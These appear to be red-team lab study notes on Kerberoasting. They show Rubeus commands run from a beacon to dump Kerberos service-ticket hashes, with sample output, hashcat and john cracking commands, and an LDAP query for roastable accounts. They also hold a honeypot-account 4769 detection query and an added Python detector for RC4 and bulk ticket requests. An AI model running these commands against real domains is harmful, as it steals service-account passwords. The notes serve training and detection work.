Secondary Categories: 02 - Cryptography 02 - Initial Access Links: Password Cracking Search Tag:📕
Kerberoasting
Description:
Services run on a machine under the context of a user account. These accounts are either local to the machine (LocalSystem, LocalService, NetworkService) or are domain accounts. A Service Principal Name (SPN) is a unique identifier of a service instance. SPNs are used with Kerberos to associate a service instance with a logon account and are configured on the User Object in AD.
Part of the TGS returned by the KDC is encrypted with a secret derived from the password of the user account running that service. Kerberoasting is a technique for requesting TGSs for services running under the context of domain accounts and cracking them offline to reveal their plaintext passwords. Rubeus kerberoast can be used to perform kerberoasting. Running it without further arguments will roast every account in the domain that has an SPN (excluding krbtgt).
```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
[*] Action: Kerberoasting
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 3
$krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io*$CC1E7D[...]331F0E
$krb5tgs$23$*squid_svc$dev.cyberbotic.io$HTTP/squid.dev.cyberbotic.io@dev.cyberbotic.io*$55AACE[...]45F184
$krb5tgs$23$*honey_svc$dev.cyberbotic.io$HoneySvc/fake.dev.cyberbotic.io@dev.cyberbotic.io*$530955[...]626817
```
Even though Rubeus does not include the krbtgt account, it can sometimes be cracked.
Hashcat
These hashes can be cracked offline to recover the plaintext passwords for the accounts. For hashcat:
```
$ hashcat -a 0 -m 13100 hashes wordlist
```
John
```
$ john --format=krb5tgs --wordlist=wordlist mssql_svc
Cyberb0tic (mssql_svc$dev.cyberbotic.io)
```
The hash format for John should be as follows:
```
$krb5tgs$23$*mssql_svc$dev.cyberbotic.io*$6A9E[blah]
```
NOTICE By default, Rubeus will roast every account that has an SPN. HoneyPot accounts can be configured with a fake SPN, which will generate a 4769 event when roasted. Since this event would never otherwise be generated for that service, it provides a high-fidelity indication of this attack.
```
event.code: 4769 and winlog.event_data.ServiceName: honey_svc
```
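A detection pass over 4769 events for the honeypot rule above plus the RC4 (etype 0x17) pattern that a default Rubeus roast leaves, as an added example that is not part of the original notes. The sample events, the user jdoe, the client IPs and the bulk threshold are all constructed assumptions.

```python
"""Flag Kerberoasting in Windows 4769 (TGS request) events.

Rule 1 is the page's honeypot rule: any TGS request for honey_svc.
Rule 2 flags RC4 tickets (etype 0x17/0x18) for user accounts, the etype a
default Rubeus kerberoast asks for; computer accounts ($) and krbtgt are skipped.
Rule 3 flags one client pulling RC4 tickets for many services, i.e. roasting
every SPN rather than selective targeting.
"""
HONEY_ACCOUNTS = {"honey_svc"}   # accounts that exist only to be roasted
RC4_ETYPES = {"0x17", "0x18"}    # RC4-HMAC / RC4-HMAC-EXP
BULK_THRESHOLD = 3               # assumption: distinct services per client


def ev(user, service, etype, ip, event_id=4769):
    """Build a minimal 4769 record using Microsoft's event_data field names."""
    return {"EventID": event_id, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip}


# Constructed sample events (not real log data), realm taken from the page.
EVENTS = [
    # one client requesting RC4 tickets for every SPN account, as Rubeus does
    ev("jdoe@DEV.CYBERBOTIC.IO", "mssql_svc", "0x17", "10.10.17.231"),
    ev("jdoe@DEV.CYBERBOTIC.IO", "squid_svc", "0x17", "10.10.17.231"),
    ev("jdoe@DEV.CYBERBOTIC.IO", "honey_svc", "0x17", "10.10.17.231"),
    # benign: AES ticket for a computer account, TGT renewal, unrelated event
    ev("jdoe@DEV.CYBERBOTIC.IO", "SQL-2$", "0x12", "10.10.17.231"),
    ev("WKSTN-1$@DEV.CYBERBOTIC.IO", "krbtgt", "0x12", "10.10.17.25"),
    ev("jdoe@DEV.CYBERBOTIC.IO", "mssql_svc", "0x17", "10.10.17.25", event_id=4768),
]


def detect(events):
    """Return (rule, client_ip, detail) alerts for the given events."""
    alerts = []
    rc4_services = {}  # client ip -> set of user-account services requested with RC4
    for e in events:
        if e["EventID"] != 4769:
            continue
        svc, etype, ip = e["ServiceName"], e["TicketEncryptionType"].lower(), e["IpAddress"]
        if svc in HONEY_ACCOUNTS:
            alerts.append(("honeypot_spn", ip, svc))
        if etype in RC4_ETYPES and not svc.endswith("$") and svc.lower() != "krbtgt":
            alerts.append(("rc4_user_spn", ip, svc))
            rc4_services.setdefault(ip, set()).add(svc)
    for ip, svcs in rc4_services.items():
        if len(svcs) >= BULK_THRESHOLD:
            alerts.append(("bulk_roast", ip, f"{len(svcs)} services"))
    return alerts
```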
A safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.
```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
[*] TOTAL NUMBER OF SEARCH RESULTS: 4
[+] cn : krbtgt
[+] servicePrincipalName : kadmin/changepw
[+] samaccountname : krbtgt
[+] cn : MS SQL Service
[+] servicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
[+] samaccountname : mssql_svc
[+] cn : Squid Proxy
[+] servicePrincipalName : HTTP/squid.dev.cyberbotic.io
[+] samaccountname : squid_svc
[+] cn : Honey Token
[+] servicePrincipalName : HoneySvc/fake.dev.cyberbotic.io
[+] samaccountname : honey_svc
```
We can also roast individual accounts with the /user parameter.
```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
[*] SamAccountName : mssql_svc
[*] DistinguishedName : CN=MS SQL Service,CN=Users,DC=dev,DC=cyberbotic,DC=io
[*] ServicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
[*] PwdLastSet : 8/15/2022 7:46:43 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io*$CC1E7D[...]331F0E
```
Resources:
| Title | URL |
|---|---|
| place | holder |
Created Date: November 20th 2022 16:28
Last Modified Date: November 20th 2022 16:28